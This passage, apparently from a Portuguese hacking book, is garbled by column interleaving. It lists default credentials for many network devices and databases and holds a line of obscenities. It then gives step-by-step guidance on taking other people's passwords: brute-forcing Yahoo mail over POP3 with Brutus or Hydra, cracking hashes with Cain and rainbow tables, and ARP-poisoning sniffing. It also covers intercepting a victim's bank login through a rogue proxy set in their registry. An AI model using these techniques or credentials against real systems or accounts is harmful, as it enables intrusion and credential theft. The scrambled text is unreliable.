- adm none Alteon ACEswitch 180e (telnet) - admin blank any aany IOS no default login no default
3com NBX100 2.8 administrator 0 Alteon Web Systems All hardware releases Web OS password
3Com Office Connect Remote 5.2 Any Router and Switch 10 thru 12 cisco cisco
812 none admin ConfigMaker Software any? n/a cmaker
- root !root Any Firmware IDS (netranger) - root attack
3com Super Stack 2 Switch Any manager manager Pri MGX * superuser superuser
3com Superstack II Dual Speed apcuser apc N\A N\A prixadmin prixadmin
500 MasterSwitches - apc apc Net Ranger 2.2.1 Sol 5.6 root attack
- security security Apple Airport 1.1 none public CISCO Network Registrar 3 ADMIN changeme
3Com SuperStack II Switch Apple Network Assistant 3.X None xyzzy VPN 3000 Concentrator - admin admin
1100 Arrowpoint any? - admin system xxxx 12 rob's knob
- manager manager Ascend All TAOS models all admin Ascend Cobalt RaQ * Qube* Any admin admin
3Com SuperStack II Switch Starlan SmartHUB 9.9 N/A manager Comersus Shopping Cart 3.2 Win
1100 AWARD Any BIOS - AWARD_SW - 95/98/NT
- security security Axent NetProwler manager WinNT administrator admin admin dmr99
3Com SuperStack II Switch 200 V1.32 - admin - Compaq Insight Manager - Administrator administrator
2200 2100 Network Camera Linux Compaq Insight Manager - operator operator
- debug synnet (ETRAX) Compaq Management Agents All administrator none
3Com SuperStack II Switch root pass Coyote-Point Equaliser 4 Free BSD eqadmin - Serial port
2700 NPS 530 5.02 root pass only
- tech tech StorPoint CD100 4.28 root pass equalizer
3Com SuperStack II Switch Networks ASN / ARN Routers Any Manager Manager oyote-Point Equaliser 4 Free BSD root - Serial port only -
3300 Nortel Networks Accelar 1xxx switches Any rwa rwa Coyote-Point Equaliser 4 Free BSD look - Web Browser
- manager manager Nortel Networks Remote Annex 2000 Any admin IP only (Read a
3Com Switch 3000/3300 - manager manager address look
3Com Switch 3000/3300 - admin admin Weblogic 5.1 system weblogic Coyote-Point Equaliser 4 Free BSD touch - Web Browser
197 Bintec all Routers Any admin bintec only (Write
3Com Switch 3000/3300 - security security Borland Interbase Any politcally correct touch
3com Switch 3000/3300 - Admin 3com Borland/Inprise Interbase any SYSDBA masterkey Cyclades MP/RT - super surt
3Com Switch 3000/3300 - monitor monitor Brocade Silkworm - admin password Powerapp Web 100 Linux RedHat
COM - 1.25 root letmein 198 6.2
Routers - netman netman Buffalo/MELCO AirStation WLA-L11 - root (cannot be root powerapp
PowerVault 35F - root calvin Lotus Domino Go NetApp NetCache any admin NetCache
PowerVault 50F WindRiver WebServer Netgear RT311 Any Admin 1234
(E (net.commerce edition) Netgear RT311/RT314 - admin 1234
root calvin ANY ? webadmin webibm Netgear RT314 Any Admin 1234
Digiboard Portserver 8 & 16 any root dbps NetCommerce PRO 3.2 ncadmin ncadmin Netopia R7100 4.6.2 admin admin
199 RS/6000 AIX root ibm Netscreen - - netscreen netscreen
DLink DI 106 winnt administrator @*nigU^D.ha,; Imperia Software Imperia Content Netscreen NS-5, NS10, NS-100 2 netscreen netscreen
DLink DI-206 ISDN router 1.* Admin Admin Managment System 201
Dupont Digital Water Unix/NT superuser superuser Nokia - Telecom NZ M10 - Telecom Telecom
Proofer 200 Nortel Contivity Extranet
Sun Sparc any root par0t Ipswitch Whats up Gold 6.0 Windows Switches
Firewall 2.5c hostname/ip address sysadmin 9x a 2.x admin setup
Ericsson ACC - netman netman admin admin Nortel Meridian 1 PBX OS
Ericsson (formerly ACC) Any router all netman netman sales 254 compaq janta sales janta211 Release 2
Extended Systems ExtendNet 4000 / Juniper All Junos 4.4 root none 00
Firewall Lantronix LPS1-T Print Server j11-16 any system Nortel Norstar Modular ICS Any **ADMIN (**23646)
all Lantronix LSB4 any any system ADMIN (23646)
Versions Goldstream 2.5.1 LR-ISDN LR-ISDN Nortel Norstar Modular ICS Any **CONFIG (266344)
admin admin Linksys BEFSR41 - (blank) admin CONFIG (266344)
Extended Systems Print Servers - admin extendnet inksys BEFSR7(1) OR (4) Standalone Nortel Shasta any admin admin
General Instruments SB2100D Cable Modem - test test R Novell NetWare Any guest -
gonet - - fast abd234 blank admin Novell NetWare any PRINT -
Hewlett Packard HP Jetdirect (All Models) Any none none Livingston Livingston_officerouter - !root blank Novell NetWare Any LASER -
Hewlett Packard MPE-XL - HELLO MANAGER.SYS Livingston Livingston_portmaster2/3 - !root blank Novell NetWare Any HPLASER -
Hewlett Packard MPE-XL - HELLO MGR.SYS Lucent AP-1000 - public public Novell NetWare Any PRINTER -
Hewlett Packard MPE-XL - HELLO FIELD.SUPPORT Lucent Cajun Family - root root Novell NetWare Any LASERWRITER -
Hewlett Packard MPE-XL - MGR CAROLIAN Lucent Packetstar (PSAX) - readwrite lucenttech1 Novell NetWare Any POST -
Hewlett Packard MPE-XL - MGR CCC Lucent Portmaster 2 - !root none Novell NetWare Any MAIL -
Hewlett Packard MPE-XL - OPERATOR COGNOS lucent Portmaster 3 unknown !root !ishtar Novell NetWare Any GATEWAY -
Hewlett Packard MPE-XL - MANAGER HPOFFICE MacSense X-Router Pro - admin admin Novell NetWare Any GATE -
2210 RIP def trade microcom hdms unknowen system hdms Novell NetWare Any ROUTER -
- OS/400 QSECOFR QSECOFR Microsoft NT - - start Novell NetWare Any BACKUP -
AS/400 - qsysopr qsysopr MICROSOFT NT 4 free user user Novell NetWare Arcserve CHEY_ARCHSVR
AS/400 - qpgmr qpgmr MICROSOFT NT 4 free user user WONDERLAND
AS/400 OS/400 QUSER QUSER Microsoft SQL Server - sa - Novell NetWare Any WINDOWS_PASSTHRU -
AS400 Any QSECOFR QSECOFR Microsoft Windows NT All Administrator - 1094 IS Chassis 4.x ods ods
AS400 - QSRVBAS QSRVBAS Microsoft Windows NT All Guest - Optivision Nac 3000 & 4000 any root mpegvideo
AS400 - QSRV QSRV Microsoft Windows NT All Mail - Oracle 7 or later - system manager
DB2 WinNT db2admin db2admin Microsoft Windows NT 4 pkoolt pkooltPS Oracle 7 or later - sys change_on_install
LAN Server / OS/2 2.1, 3.0, Motorola Motorola-Cablerouter - cablecom router Oracle 7 or later Any Scott Tiger
4. -Tech RASExpress Server 5.30a guest none Oracle 8i 8.1.6 sys change_on_install
username password Nanoteq NetSeq firewall * admin NetSeq Oracle 8i all internal oracle
Oracle Internet Directory Terayon TeraLink Getaway - user password todos.
Service Tiara - tiara tiaranet Engenharia Social: Voc pode simplesmente se passar
any cn=orcladmin welcome Titbas - SCO haasadm lucy99 por algum e
oracle co. Database engines every sys change_on_install TopLayer AppSwitch 2500 Any siteadmin toplayer pedir a senha.
Osicom(Datacom) Osicom(Datacom) - sysadm sysadm Toshiba TR-650 V2.01.00 admin tr650 Keyloggers: Utilizar-se de programas capturadores de
Pandatel EMUX all admin admin TrendMicro ISVW (VirusWall) any admin admin teclas para
RapidStream RS4000-RS8000 Linux rsadmin rsadmin Trintech eAcquirer App/Data obter a to desejada senha de acesso. Processo eficaz,
Research Machines Classroom Assistant Windows Servers mas ainda
95 - t3admin Trintech possui o defeito de depender de Engenharia Social para
manager changeme ka pattha Gand mara Gandoo Bhosda Lund sua
202 TOTALswitch Any none amber instalao.
Rodopi Rodopi billing software Technologies ConnectReach 3.6.2 (none) (none) Fora-Bruta: Parecida com o ataque de dicionrios, mas
'AbacBill' sql database Webmin Webmin Any admin - esse
- rodopi rodopi 203 mtodo no utiliza palavras prontas em uma lista e, sim,
Securicor3NET Cezzanne any manager friend Unix/Lin gera todas
Securicor3NET Monet any manager friend Webramp 410i etc... - wradmin trancell as combinaes possveis de caracteres para tentar como
all all root n/a Wireless Inc. WaveNet 2458 n/a root rootpass senha. ,
Embedded Support Xylan Omnistack 1032CF 3.2.8 admin password de longe, o mtodo mais eficiente para senhas
Partner Xylan Omnistack 4024 3.4.9 admin password criptografadas locais e,
IRIX 6.5.6 Administrator Partner Xylan Omniswitch 3.1.8 admin switch remotamente, no d muito resultado.
Embedded Support xyplex mx-16xx - setpriv system Criptoanlise: Utilizao de rainbow tables para
Partner ZYXEL 641 ADSL - - 1234 apressar o processo
IRIX 6.5.6 Administrator Partner Zyxel ISDN Router Prestige da fora-bruta (que, em alguns casos, levaria anos para
IRIX ALL lp lp 100IH terminar).
IRIX ALL OutOfBox, demos, - - 1234 204
guest, 4DGifts Zyxel ISDN-Router Prestige Ataque de dicionrios: O ataque de dicionrios consiste
(none by default) 1000 em criar
IRIX ALL EZsetup - - - 1234 uma lista de palavras (wordlist) ou senhas muito utilizadas
Shiva AccessPort Any hello hello Zyxel prestige 128 modemrouter e valer-se
Shiva Any? - Guest blank any - 1234 dessas informaes. Se a pessoa utilizar uma senha
nbg800 unknown admin 1234 prestige 300 series zynos 2.* - 1234 simples ou fraca,
SonicWall Any Firewall Device - admin password 12.2 Descobrindo Senhas esse processo costuma ser bem eficiente.
- SunOS Para fins de Penetration test, vamos enumerar as Sniffers: Os farejadores. Tambm muito eficientes
4.1.4 maneiras existentes para capturar
root - para a descoberta de senhas. Mtodos existem diversos, senhas em redes locais, mesmo quando essas redes so
surecom ep3501/3506 own os admin surecom mas vou tentar segmentadas.
Tekelec Eagle STP - eagle eagle padroniz-los e dividir por categorias. Voc v, a seguir, Man in the middle: Ataques de homem no meio.
Telebit netblazer 3.* - setup/snmp setup/nopass alguns tipos: Especialmente
terayon - 6.29 admin nms Password Guessing: O famoso chute. Nada mais do interessantes para capturar senhas de ambientes
Terayon TeraLink 1000 Controller - admin password que tentar criptografados como
Terayon TeraLink 1000 Controller - user password manualmente entrar diversas senhas. O mtodo menos SSH e SSL.
Terayon TeraLink Getaway - admin password eficaz de
At keyloggers ns j vimos anteriormente no livro. Vamos duas vezes desconectar-se e conectar de novo para novas senhas de e-mails muito mais rapidamente que utilizando
dar uma tentativas. HTTP Form.
olhada, ento, a partir de Fora-bruta. Para demonstrar essa tcnica, vamos analisar o software Por exemplo: eu quero descobrir uma senha do Yahoo,
12.3 Fora-Bruta Remota Brutus: mas o
O processo de bruteforce (fora-bruta) remota no dos 205 yahoo.com.br permite que voc use um servidor POP3
mais Vou explicar passo a passo todas as sesses do para ler os emails
eficientes. Como eu disse anteriormente, a menos que a programa que voc viu atravs do seu outlook ou outro programa qualquer. Se
pessoa use uma anteriormente. Assim ficar mais fcil utiliz-lo e voc eu
senha muito simples e fcil (como nome de algum parente, compreender utilizasse HTTP Form, demoraria muito tempo para
namorado, time melhor o seu funcionamento. descobrir, algo
etc.) vai ser demorado e intil na maioria dos casos. Mas, Target: Aqui voc coloca o endereo de onde voc vai como uma ou duas tentativas por segundo. Mas, se eu
mesmo assim, descobrir a tentar o
no um processo que deve ser descartado, pois senha. Isso pode ser muito varivel. Por exemplo, se voc endereo pop.mail.yahoo.com.br, que o endereo POP3
infelizmente a maioria for para
das pessoas ainda utiliza senhas muito fceis de serem descobrir uma senha de HTTP FORM (visto depois), no recebimento de e-mails do Yahoo (cada provedor/site
descobertas. adianta tem o seu -
Outro problema que esse ataque pode ser facilmente apenas voc colocar www.site.com, voc teria que colocar procure saber qual ) vou conseguir aumentar a
detectado, o caminho velocidade para 12
bloqueado e logado. Isso porque ele leva o nome fora- inteiro do formulrio. Isso poderia ser complicado para ou 13 tentativas por segundo.
bruta at as algumas - Telnet: Utilizado para descobrir senhas de sistemas
ltimas conseqncias. O mtodo fcil de ser entendido: pessoas. Caso esteja tentando descobrir uma senha de remotos que
voc vai FTP ou POP3, aceitam conexo via telnet (porta 23). Por exemplo, um
configurar no software o endereo IP ou nome de domnio por exemplo, s colocar o endereo do site, na maioria sistema
do sistema do das vezes. Linux ou Unix.
qual voc quer descobrir a senha, o tipo de servio (se Type: Esse o mais importante de todos. Voc vai - SMB (Netbios): Senhas para acesso a sistemas Windows
senha de FTP, definir que tipo de por
Telnet, POP3 etc.) e a porta. Existem outras configuraes, senha quer descobrir. Os tipos so: compartilhamento de arquivos.
como tempo de - HTTP Basic Auth: Esse utilizado para se descobrir - Custom: Voc pode customizar como quiser.
expirao da conexo, quantidade de conexes senhas de Depois, temos os botes Start (Iniciar), Stop (Parar) e
simultneas e quantas autenticao bsica em pginas Web (no baseadas em Clear (Limpar). E,
tentativas por conexo sero feitas. Isso pode influenciar formulrios). logo em seguida, as opes:
da seguinte - HTTP Form: Para descoberta de senhas que utilizam Port: Porta do servio que voc vai utilizar para
maneira: formulrios. descobrir a senha.
Imagine que o servidor de FTP bloqueie a conta de Ex: e-mails do Yahoo e Hotmail. Geralmente no precisa mexer, quando voc escolhe o
determinado usurio se, 206 tipo de servio
durante uma mesma conexo, a senha for digitada - FTP: Descobrir senhas de servidores FTP, utilizados para que quer descobrir, ele coloca automaticamente a porta.
incorretamente trs transferncia de arquivos. Connections: Quantidade de conexes simultneas que o
vezes (procedimento padro em todo sistema com um - POP3: Esse importante. utilizado para o recebimento programa
mnimo de de e-mails far com o servidor. Quanto mais, mais rpido a senha
segurana). Ento, s configurar o programa de fora- atravs de programas prprios. Atravs dele, voc pode ser
bruta para tentar enviar descoberta. Mas isso pode gastar muita banda do seu
computador e
do servidor, fazendo com que acabe ficando mais lento Usuario3 pode descobrir senhas mais simples, mas, caso deseje
que antes. Se Single User estiver marcado, aparecer UserID. Da descobrir
Adapte com cuidado. s colocar o nome senhas mais complexas, pode levar muito tempo e a
Timeout: Tempo que iro durar as conexes. Pode do usurio. chance de no
deixar como est. Depois veremos Pass Mode. Ela mostra trs tipos de 208
A seguir, voc ver algumas configuraes exclusivas de senhas para serem conseguir nesse caso grande. Dentro da opo Range,
cada tipo de descobertas. Wordlist, ComboList e Bruteforce. voc pode
servidor. Por exemplo, se voc selecionar o POP3, Wordlist: Uma lista de palavras comumente usadas. Por configurar o tamanho mnimo e mximo da senha (Min
aparecer a opo Try exemplo, Length e Max
to stay connected for... (tentar ficar conectado para) e voc pode carregar uma lista de palavras com vrios Length) e o que ser tentado: s dgitos (Digits only),
voc pode escolher nomes e tentar letras
quantas tentativas o programa far antes de se usar todos eles como senha. Sabendo que vrias pessoas minsculas (Lowercase Alpha), letras maisculas
desconectar e conectar de utilizam (Uppercase Alpha),
novo se quiser, simplesmente coloque Unlimited senhas fceis (nomes de atores, datas de nascimento etc.), maisculas e minsculas (Mixed Alpha), letras e nmeros
(ilimitado). s vezes, sua (AlphaNumeric) ou todos os caracteres do teclado,
certas configuraes de proteo bloqueiam um usurio chance de descobrir uma senha fcil grande aqui. O incluindo smbolos
aps ele errar a Brutus vem como +, - e * (Full Keyspace).
senha trs vezes seguidas. Da voc teria que configurar com uma lista de palavras em Ingls, mas, se quiser, Por ltimo, voc tambm pode customizar quais
para o sistema existem listas caracteres sero usados.
tentar duas vezes, desconectar e conectar de novo. em Portugus na Internet. Ou voc pode fazer a sua Positive Authentication Results mostra que senhas voc j
12.3.1 Authentication Options (Opes de Autenticao) prpria. Exemplo descobriu,
207 de uma lista: destacando o endereo e o nome do usurio. Fique
Aqui, voc pode definir o usurio que quer descobrir a Amor atendo tambm na
senha e o mtodo Andreia barra inferior do Brutus que mostra que senha est sendo
que ser utilizado. Adriana tentada no
Use Username: Marque essa opo se a senha que voc Antonio momento, a quantidade de tentativas por segundo e o
est ... tempo que demora
tentando descobrir necessita que se d um nome de ComboList: a WordList melhorada. Por exemplo, certas para acabar.
usurio. Netbios pessoas Dica: Se quiser tentar descobrir uma senha de e-mail, no
para sistemas Windows 95, 98 e ME, por exemplo, no tm o pssimo hbito de colocar um nmero no fim da tente pelo
necessitam de senha. Ser webmail. Consiga o endereo do servidor POP3 e tente
usurio, somente de senha. to mais seguro assim? Exemplo: em vez de colocar por ele. muito
Single User: Marque se voc quer descobrir somente a marcos como mais rpido e eficiente.
senha de um senha, eu coloco marcos1. exatamente isso o que o Existe uma outra opo de fora-bruta remota, um
usurio. Se quiser de vrias pessoas, deixe desmarcado. ComboList programa que
Se o Single User estiver desmarcado, aparecer User File. descobre. Ele pega as senhas que esto na WordList e muitos consideram bem melhor que o Brutus. o THC-
Voc ter que coloca HYDRA. Ele suporta
selecionar um arquivo que contm o nome dos usurios, nmeros no fim, muda para maisculo, inverte a senha etc. diversos tipos de bruteforce, como conexes em bancos
um em cima do Tpicas de dados SQL e
outro. Assim: coisas que uma pessoa comum faz. SSH, entre outros. Abaixo, uma imagem do HYDRA
Usuario1 BruteForce: o mais poderoso e o mais demorado. Com rodando (ele possui
Usuario2 ele, voc modo GUI e console)
209 ssssssss 4bbde07660e5eff90873642cfae9a8dd nmeros, rapidamente o processo acaba. Por isso, o
12.4 Fora-Bruta Local E o software vai tentando, por dias, horas, meses, anos, perigo de se usar
A fora-bruta local muito mais eficiente do que a dependendo do datas de aniversrio e telefones. Voc se assustaria com
remota, nem d tamanho da senha e do seu poder de processamento. At a velocidade que
para comparar. Por exemplo: enquanto na remota voc que uma hora, essas senhas so descobertas. A seguir, voc v o
consegue, em quando o hash bater com o original, a senha processo terminado.
mdia, de sete a dez senhas testadas por segundo, na descoberta: 212
local voc pode pro4chle -> 571ac9ece60b2644c55c035a629cb0ba A senha encontrada 101010, que infelizmente usada
conseguir at 3,4 milhes por segundo, dependendo da Existem diversos programas para se realizar esse por muita
capacidade da sua processo. Alguns gente.
mquina e do algoritmo de encriptao. Como assim comerciais, como o L0phtCrack, e outros gratuitos, como o O ataque de dicionrios nada mais do que a fora-
encriptao? No Cain. Este bruta utilizando
estamos falando de senhas? Sim, mas quando se trata de ltimo um dos melhores e mais completos programas de listas de palavras, ento, no vou criar uma seo para
fora-bruta local, segurana. Voc ele. exatamente o
geralmente falamos de senhas criptografadas. ver que retornaremos a ele em diversas sees do livro. mesmo processo mostrado no bruteforce remoto e local.
Mas, espera a... no seria mais simples apenas Justamente por 12.5 Rainbow Tables
descriptografar essas isso ele ser o escolhido aqui para a demonstrao. Quando a fora-bruta local levar muito tempo para ser
senhas? Acontece que isso no possvel. Geralmente o Primeiro abra o programa. Depois, v para a seo completada,
tipo de criptografia Cracker. ns podemos tentar outro recurso mais interessante. Iremos
utilizado para gerar as senhas, o hash, de mo nica, 210 gerar uma
no pode ser Escolha o tipo de algoritmo de criptografia do qual voc rainbow table: uma espcie de wordlist contendo diversas
revertido. Para tentar descobrir qual a senha quer palavras e
criptografada, os programas descobrir a senha. LM e NTLM so senhas de Windows NT nmeros e com o seu equivalente criptografado. A
de bruteforce usam um mtodo interessante: eles e PWL de utilidade desse processo
codificam a informao a Windows 9x; ainda existem senhas de VNC, SQL e que o programa de bruteforce no precisar tentar
ser testada com o mesmo algoritmo e testam os dois. Se outras. No exemplo, fui adivinhar a senha,
coincidirem, a em MD5 e acrescentei alguns hashs para serem s ir nesse arquivo e consult-lo. Claro que pode ficar
senha foi descoberta. Por exemplo: descobertos. Clique com o gigantesco,
Tenho o seguinte hash criptografado de senha, utilizando boto direito e selecione a fora-bruta (bruteforce). dependendo da quantidade de caracteres que voc
o algoritmo MD5: Escolha os caracteres a utilizar para cri-lo.
571ac9ece60b2644c55c035a629cb0ba serem testados (se s nmeros, letras minsculas etc.) e o Exemplo: uma rainbow table contendo letras minsculas,
E mando o programa de fora-bruta gerar combinaes tamanho da maisculas,
aleatrias e senha (at 32 caracteres o mximo). nmeros e caracteres estendidos, de 1 a 15 caracteres,
verificar o hash: Veja que, no exemplo, eu coloquei 32 como tamanho deve ocupar, em
Senha mximo e todos os mdia, uns 50 a 60 GB em disco. Mas, em compensao,
tentada caracteres (inclusive estendidos, como espao, barras, isso permitir
Hash criptografado asterisco etc.). Olhe descobrir senhas em segundos ao invs de dias.
h4e8riew aa5717e6412e75ecd6c6dca6632b8f2b o tempo estimado... mais de um ano para terminar. O Cain tem o recurso de usar as rainbow tables
9ieqlawo 3107fa2516cb015f162115b30fa1cd65 211 (criptoanlise). Mas,
c1las6ia 830329c4e7f9948ee366ba87a5b63fd2 Se ns tentarmos um conjunto de caracteres bem menor, para isso, voc precisa cri-las primeiro. Um bom
7lekiust 061fd09716f00fed3a8866052db55a81 como programa para fazer isso
12345828 ae373a125f190a5829ef6b7e5107adbf o Winrtgen.
213 senhas, voc vai receber muito lixo. Voc pode at criar Existem outros programas variantes de captura de senhas
12.6 Sniffers filtros (como, por
O ato de sniffar ou farejar uma rede um dos processos personalizados com palavras-chave como password, exemplo, o MSN Sniffer, que captura credenciais do
mais antigos senha, user, login etc., Messenger da
do hacking e o mais interessante. Quando a rede utiliza mas no um processo to eficiente. Microsoft), mas no possuem tantos recursos e s
um multirepetidor A soluo? Utilizar um sniffer que s capture as senhas e, funcionam em rede local,
(HUB) ou uma topologia que faa com que os dados melhor ainda, como qualquer outro sniffer. Isso interessante focar: o
sejam enviados a todos consiga dividi-las em categorias. Muitos programas, como processo de
os sistemas ao mesmo tempo (atravs de o WinSniffer e o farejamento no pode ser feito alm dos limites dos
broadcast/multicast, por Cain, fazem isso. endereos IPs
exemplo), possvel utilizar o sniffer (exceto em casos Outro problema: se a rede estiver utilizando switch e for privados. Traduzindo: voc tentar farejar o computador
que citarei depois). comutada, de uma pessoa que
Quando os frames (pacotes) so direcionados a uma dividindo-a em segmentos, o sniffer no captura nada, est em outro provedor impossvel, mas realizar esse
certa mquina, pois os dados no processo para
no caso do HUB, eles so enviados para todas as so repetidos como no hub (que um multirepetidor). O capturar as senhas de pessoas que estejam usando uma
mquinas ligadas a ele. que fazer agora? lan house j
Apenas a mquina qual o pacote foi endereado A entra o ARP POISONING. Lembra dele? o processo funciona, pois esto em rede local.
envia-o para suas que citamos quando Wireless Sniffing
camadas superiores para ser processado, o resto dos vimos o IP Spoofing no STerm. Voc envenena o cache Hoje em dia moda tambm farejar trfego de redes
computadores ARP das mquinas rdio (wi-fi,
simplesmente descarta o pacote. Seria interessante, 215 802.11b/g). Existem diversos programas que conseguem
ento, que voc inserindo entradas falsas e direcionando todas para que capturar esses
tivesse um programa que "capturasse" esses pacotes faam os dados dados, mas eu sugiro um em particular: o prprio Cain.
antes que o sistema passarem por voc. E, no caso do Cain, ele tem um Ele possui esse
os descartasse. Isso o sniffer. recurso para que voc recurso com uma maneira bem fcil de ser usada e,
Veja o packetsniffer capturando pacotes: possa realizar esse processo automaticamente. quando se coloca nele
Voc pode ver o contedo de cada pacote. Clique duas V em Sniffer e clique em hosts. Clique com o boto uma opo para tentar crackear WEP e WPA (algoritmos
vezes em qualquer direito do mouse e de criptografia
um dos pacotes capturados e aparecer o que tem neles. selecione Scan MAC Addresses. comumente usado em wi-fi), ele se torna perfeito.
mostrado em 216 217
hexa e ascii. Essa varredura vai identificar o endereo MAC de todos Mas existem outros programas interessantes para farejar
214 os redes rdio.
Normalmente, voc consegue obter quase tudo: senhas de computadores que esto na rede local. Isso necessrio Bons exemplos so AirSnort, Kismet, WireShark, etc.
webmail, para que o ARP Normalmente, o processo para se obter acesso uma
conexes de Telnet, FTP, mensagens de messengers poisoning possa agir. Aps os sistemas serem descobertos, rede a rdio o
instantneos, e-mails eles iro ficar seguinte:
etc., salvo para os dados criptografados como SSL, SSH, em uma lista na janela de hosts. Depois que eles j - Encontrar o SSID da rede (identificador da rede)
SFTP etc. Estes s estiverem l, ative o - Se a rede tiver criptografia, deve utilizar a chave
em situao de man in the middle (explicado depois) sniffer, clicando no boto que parece uma placa de rede, necessria
podem ser obtidos. e o ARP poisoning, - Somente a , quando se conectar ela, poder farejar
Mas tambm existe outro problema: se a sua inteno clicando no boto que parece um smbolo atmico (o o trfego.
apenas capturar amarelo e preto).
Acontece que isso no muito til. Muitas vezes , as cliente, que a pessoa que est se conectando pgina espcie de servidor Web para o computador cliente,
pessoas colocam a ou recurso seguro entregando o
opo de no fazer o broadcast do SSID, ou seja, a rede e o sistema remoto. Se eu sniffar (farejar) o trfego, vou Computador
nem detectada. obter informaes Cliente
Em sistemas Linux, possvel colocar a placa de rede em sim, mas sero lixos, pois esto em cdigo e, alm disso, a Servidor
um modo pessoa Remoto
passivo especial que consegue farejar trfego de redes precisaria estar em rede local comigo. Como eu poderia Computador
wi-fi mesmo que fazer ento para Cliente
voc no esteja logado a elas ou mesmo sem detectar o capturar a senha daquela pessoa, alm dos mtodos Servidor
SSID. O Windows tradicionais? Ora, de Remoto
no tem suporte para esse tipo de utilizao. que adianta um keylogger se as pessoas hoje usam Computador
Mas farejar o trfego tambm no suficiente, se ele teclado virtual ao entrar do Hacker
estiver criptografado. no banco? Um screenlogger, como o Perfect Keylogger, 219
Acontece que se for WEP, voc pode tentar utilizar o conseguiria certificado e recebendo os dados. Em relao ao servidor
AirSnort para tentar visualizar esse teclado, mas seria detectado pelo remoto, o invasor
deduzir a chave atravs da anlise de grande quantia antivrus. A entra a agir como um cliente usando um navegador. Ele
de trfego. Ou se tcnica de man in the middle ou homem no meio. receber os dados do
for WPA, e voc obter o hash criptografado da chave, O nome traduz bem o que conseguimos fazer com essa servidor remoto e repassar ao computador cliente e
pode jogar esse valor tcnica. vice-versa. Assim,
no CAIN para tentar ser quebrado. Vamos pensar: os dados, ao chegar no servidor remoto ou ficando invisvel no meio do processo. Podemos fazer
12.7 Man in the Middle no cliente, so isso de duas
Essa uma tcnica muito eficiente e muito utilizada para descriptografados, certo? Essa transio toda feita maneiras diferentes: remotamente e em rede local.
se capturar baseando-se nas 12.7.1 Man in the Middle Remoto
senhas. Algumas pessoas at duvidam que ela exista chaves de criptografia fornecidas com o certificado. Mas Nessa situao, no podemos utilizar um programa que
(esses indivduos e se eu fizesse o faa o
gostam de possuir uma falsa sensao de segurana, seguinte: arrumasse uma maneira de entregar um homem no meio local, como o Cain e o Webmitm do
acreditanto certificado meu para o DSniff. A soluo
totalmente que servios criptografados no do margem computador cliente, faz-lo pensar que sou o servidor utilizar um servidor proxy. Instalaremos esse servio no
para captura dos remoto e fazer com nosso computador
218 que, assim, ele me envie os dados, baseando-se na chave e faremos as configuraes de conexo do computador
dados. Isso verdade quando se trata de sniffers, mas a pblica que eu cliente para acessar
coisa aqui forneci? Eu capturo esses dados, que graas minha atravs do nosso endereo IP ou DNS dinmico. O
completamente diferente). chave privada do programa proxy que
Quando acessamos um site seguro ou qualquer outro certificado estaro descriptografados, criptografo-os usaremos, prprio para isso, o Achilles.
recurso que utilize novamente e envio O Achilles um proxy feito pra agir em modo man in the
criptografia, como SSH (Secure Shell), a nossa conexo se para o servidor remoto como se fosse o computador middle. Se
faz dessa cliente. voc no marcar a opo Intercept Mode ON ele age
maneira: A coisa ficar assim: como um servidor
Criptografia (SSL, SSH etc.) Criptografia Criptografia proxy normal. Nele, voc especifica o certificado que
Isso significa que os dados esto transitando um processo simples. O computador do hacker vai agir ser entregue ao
criptografados entre o como uma sistema cliente (Cert File), se deseja interceptar os dados
do cliente, do
servidor, logar para um arquivo e ignorar JPG e GIF dados capturados. A janela Cliente mostra os dados da sniffer e o ARP poisoning, s aguarde que ele vai
(importante para no primeira conexo capturar as conexes.
capturar lixo). Escolha uma porta e ative o programa criptografada, feita com a vtima. A janela Servidor 223
(clicando no smbolo mostra os dados da O Cain consegue fazer man in the middle
que parece um play). Aps configurar o navegador do segunda conexo criptografada, feita com o servidor. automaticamente com
computador cliente Observe, na janela do cliente, os nmeros das contas e a quatro servios: HTTPS, SSH, DNS e, na verso mais nova
para acessar atravs do nosso proxy, vamos entrar em senha: do programa,
um site seguro para Esse um problema grave e que depende s de uma consegue realizar isso com o Remote Desktop do
ver o que acontece, como se fssemos o usurio que est configurao de Windows. No exemplo,
sofrendo o proxy no computador da vtima. Nenhum antivrus ou anterior, eu ocultei o site do banco no qual estava sendo
ataque. firewall pessoal vai realizada a
220 barrar e fcil configurar isso, pode ser feito pelo tcnica.
Logo na entrada, j recebemos a seguinte tela: registro, modificando-se 12.8 Outras Tcnicas de Senhas
Isso significa que h um erro com o certificado. Trs, para duas chaves: ProxyEnabled, para ativar o recurso e a Alm das tradicionais, existem algumas outras tcnicas
ser exato. chave proxy, que interessantes
Que ele foi emitido por uma empresa que voc no contm o endereo em si. Ambas ficam em para conseguir descobrir ou pelo menos mudar a senha
confia, que ele expirou InternetSettings. Muitas existente nos
ou no vlido ou que o nome no corresponde ao nome pessoas tm registro remoto ativado no Windows por sistemas. Claro que, para funcionarem, voc precisa estar
do site. A maioria padro e isso pode localmente no
dos usurios vai ignorar essa tela e clicar no Sim, que ser extremamente perigoso. computador.
deseja continuar. Existe um outro programa tambm que pode ser utilizado Resetando manualmente: Muitas vezes, ao instalar um
O Cain, ao realizar o man in the middle, cria no lugar do sistema
automaticamente uma Achilles. at mais recomendado pois como feito em Linux com o gerenciador de boot Lilo, o comando linux
cpia dos dados do certificado verdadeiro (de um banco, Java, pode rodar em single, que
por exemplo). qualquer SO, alm de ter melhorias mais freqentes. o permite entrar como root local sem a necessidade de
Assim, dos trs erros mostrados anteriormente, s Paros Proxy. saber a senha,
mostraria o primeiro, os 222 ativado por padro. Administradores infelizmente nem
outros dois ficariam verdes, indicando que est tudo 12.7.2 Man in the Middle Local sabem disso.
bem. Vamos ver esse A vantagem do homem no meio local poder realizar Boot pelo CD: Se voc conseguir fazer com que o
recurso dele daqui a pouco. Agora, vamos entrar com essa tarefa sistema local d o
uma senha qualquer em dezenas de computadores ao mesmo tempo, o que, boot pelo CD, seu problema est acabado. Utilize o
no site seguro, utilizando ainda o teclado virtual. pelo Achilles, seria NTFSDOS ou,
221 um caos. bem simples o conceito. Utilizamos ARP melhor ainda, o NT Password Recovery (www.dmzs.com).
Enquanto a pessoa estiver digitando, o Achilles nada ir poisoning para Com este
capturar. Ele envenenar o cache ARP das mquinas da rede para que ltimo, voc tem um leque de opes. Pode alterar a
no um keylogger. Assim que ela clicar em confirmar e pensem que o senha de
os dados forem nosso computador o gateway de sada. Assim, qualquer usurio de Windows NT, 2000, XP ou 2003,
enviados para o computador do hacker e l ficaremos em situao de mesmo com a
descriptografados, a sim. man in the middle, repassando os dados para o gateway proteo Syskey ativada. Ou pode acessar o registro e
Clique nos botes C (cliente) e S (servidor) no Achilles real. Parece difcil, realizar
